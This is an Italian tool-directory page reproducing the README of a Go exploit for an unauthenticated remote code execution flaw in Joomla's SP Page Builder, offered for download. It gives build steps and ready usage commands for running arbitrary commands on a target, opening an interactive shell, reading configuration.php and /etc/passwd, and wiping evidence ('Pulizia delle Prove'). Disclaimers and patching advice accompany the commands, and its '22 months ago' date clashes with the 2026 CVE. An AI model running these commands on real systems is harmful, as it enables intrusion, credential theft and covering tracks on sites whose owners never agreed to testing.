Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/gagaltotal/cve-2026-48908-sp-page-builder-joomla
Analisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubgagaltotal/cve-2026-48908-sp-page-builder-joomla

CVE-2026-48908-SP-Page-Builder-Joomla

CVE-2026-48908 - SP Page Builder Joomla RCE non autenticato

Vedi Repository
22 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-48908: SP Page Builder Joomla RCE Non Autenticata

Proof of Concept exploit per CVE-2026-48908, una vulnerabilità di Remote Code Execution non autenticata nel componente SP Page Builder di Joomla.

Panoramica della Vulnerabilità

CVE-2026-48908 è una vulnerabilità di sicurezza critica che consente ad attaccanti non autenticati di eseguire codice arbitrario su installazioni Joomla vulnerabili attraverso una gestione impropria dell'estrazione di file ZIP nel componente SP Page Builder.

Dettagli Tecnici

  • ID CVE: CVE-2026-48908
  • Componente: com_sppagebuilder
  • Versioni Vulnerabili: <= 6.6.1
  • Versione Corretta: 6.6.2
  • Vettore di Attacco: Basato su rete, non autenticato
  • Punteggio CVSS: Critico
  • Tipo di Vulnerabilità: Caricamento File Arbitrario / Estrazione ZIP RCE
  • Endpoint di Attacco: index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

Causa Principale

La vulnerabilità risiede nella funzionalità di caricamento delle risorse dove l'applicazione convalida ed estrae in modo improprio i file ZIP contenenti risorse icon. Un attaccante può creare un file ZIP malevolo con payload PHP che verranno estratti in una directory accessibile via web, consentendo l'esecuzione di codice remoto.

Requisiti

  • Go 1.26.4 o successivo
  • Accesso di rete all'installazione Joomla bersaglio
  • URL bersaglio valido

Dipendenze

  • golang.org/x/term - Utility terminali per input sicuro della password

Installazione

Da Sorgente

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go

Binario Precompilato

I binari precompilati sono disponibili nella sezione releases.

Utilizzo

Screen Capture

Esecuzione Comando Base

Screen Capture

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "whoami"

Shell Interattiva

root@kitploit:~
./poc_tot -target http://target-site.com -shell

Valutazione della Vulnerabilità

root@kitploit:~
./poc_tot -target http://target-site.com -check

Pulizia

root@kitploit:~
./poc_tot -target http://target-site.com -cleanup

Utilizzo di Token Personalizzato (se disponibile)

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"

Opzioni della Riga di Comando

root@kitploit:~
-target string
    Target URL of vulnerable Joomla installation (required)
    Example: http://target.com or https://target.com

-cmd string
    System command to execute on target
    Example: "cat /etc/passwd"

-shell
    Launch interactive shell on target (requires successful exploitation)

-check
    Check if target is vulnerable without attempting exploitation

-cleanup
    Remove uploaded shell and artifacts from target

-token string
    CSRF token for exploitation (optional, auto-detected if not provided)

Metodi di Sfruttamento

Lo strumento supporta molteplici vettori di sfruttamento:

  1. Caricamento PHP Diretto - Carica file PHP direttamente in percorsi eseguibili
  2. Attraversamento Directory - Utilizza l'attraversamento di directory per bypassare le restrizioni
  3. Manipolazione Archivi - Crafa archivi ZIP malevoli con payload incorporati
  4. Spoofing dell'Estensione - Utilizza doppie estensioni e variazioni di maiuscole/minuscole

Esempi

Ricognizione

root@kitploit:~
./poc_tot -target http://vulnerable.local -check

Esecuzione di un Singolo Comando

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"

Recupero di File Sensibili

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"

Accesso Interattivo

root@kitploit:~
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd

Pulizia delle Prove

root@kitploit:~
./poc_tot -target http://vulnerable.local -cleanup

Considerazioni sulla Sicurezza

Per Amministratori

Se stai eseguendo Joomla con il componente SP Page Builder:

  1. Aggiorna Immediatamente: Aggiorna a SP Page Builder 6.6.2 o successivo
  2. Disabilita il Componente: Se l'aggiornamento immediato non è possibile, disabilita com_sppagebuilder
  3. Monitora i Log: Controlla i log del server web per attività sospette
  4. Limita i Permessi: Assicura permessi appropriati sui file delle directory web
  5. Web Application Firewall: Implementa regole WAF per bloccare tentativi di sfruttamento

Per Ricercatori di Sicurezza

  • Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test
  • Testa prima in ambienti isolati
  • Documenta tutti i risultati in modo appropriato
  • Segui le pratiche di divulgazione responsabile
  • Non utilizzare per accessi non autorizzati

Dichiarazione di Esclusione di Responsabilità

Questo software è fornito solo a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Gli autori non accettano responsabilità per uso improprio o danni causati da questo strumento. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di utilizzare questo strumento su qualsiasi sistema bersaglio.

Utilizzando questo strumento, riconosci che:

  • Lo utilizzerai solo su sistemi di tua proprietà o per i quali hai autorizzazione scritta al test
  • Comprendi le implicazioni legali e accetti la piena responsabilità
  • Gli autori non sono responsabili per eventuali danni o conseguenze legali
  • Rispetterai tutte le leggi e i regolamenti applicabili

Avviso Legale

Questo strumento è destinato esclusivamente alla ricerca di sicurezza difensiva e ai test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici viola il Computer Fraud and Abuse Act e leggi simili in altre giurisdizioni. Ottieni sempre la corretta autorizzazione per iscritto prima di eseguire test di sicurezza.

Riferimenti

  • Centro di Sicurezza Ufficiale di Joomla: https://docs.joomla.org/Security_Checklist
  • SP Page Builder: https://www.sp-components.com/
  • Dettagli CVE-2026-48908: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48908

Mitigazione

Azioni Immediate

  1. Applica l'aggiornamento di sicurezza alla versione 6.6.2 o successiva
  2. Se l'aggiornamento non è disponibile, disabilita il componente: index.php?option=com_installer&view=manage
  3. Controlla i log degli errori per tentativi di sfruttamento
  4. Esamina il file system per file PHP sospetti nelle directory dei media

Sicurezza a Lungo Termine

  1. Mantieni Joomla e tutti i componenti aggiornati
  2. Implementa la scansione automatica della sicurezza
  3. Utilizza intestazioni di sicurezza e regole WAF
  4. Monitora l'integrità dei file
  5. Mantieni backup regolari
  6. Implementa il principio del minimo privilegio

Contributi

I contributi alla ricerca sulla sicurezza sono benvenuti. Si prega di:

  1. Segnalare le vulnerabilità in modo responsabile
  2. Seguire lo stile del codice esistente
  3. Includere documentazione dettagliata
  4. Testare accuratamente prima dell'invio

Autore

GhostGTR666 (Gagaltotal666)

  • GitHub: https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
  • Email: Contatto tramite GitHub

Registro delle Modifiche

Versione 1.0.0

  • Rilascio iniziale
  • Supporto per molteplici vettori di sfruttamento
  • Funzionalità di shell interattiva
  • Verifica della vulnerabilità e operazioni di pulizia

Supporto

Per problemi, domande o contributi:

  1. Controlla i problemi esistenti su GitHub
  2. Esamina i messaggi di errore e i log
  3. Assicurati che l'URL bersaglio sia corretto e accessibile
  4. Verifica la corretta autorizzazione prima del test

Licenza

Questo progetto è fornito così com'è per scopi di ricerca sulla sicurezza. Verifica le leggi locali riguardanti gli strumenti di sicurezza e i test di penetrazione prima dell'utilizzo.


Ultimo Aggiornamento: 2026-06-24

Dichiarazione di Esclusione di Responsabilità: Questo strumento è destinato solo a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.

Scarica lo strumento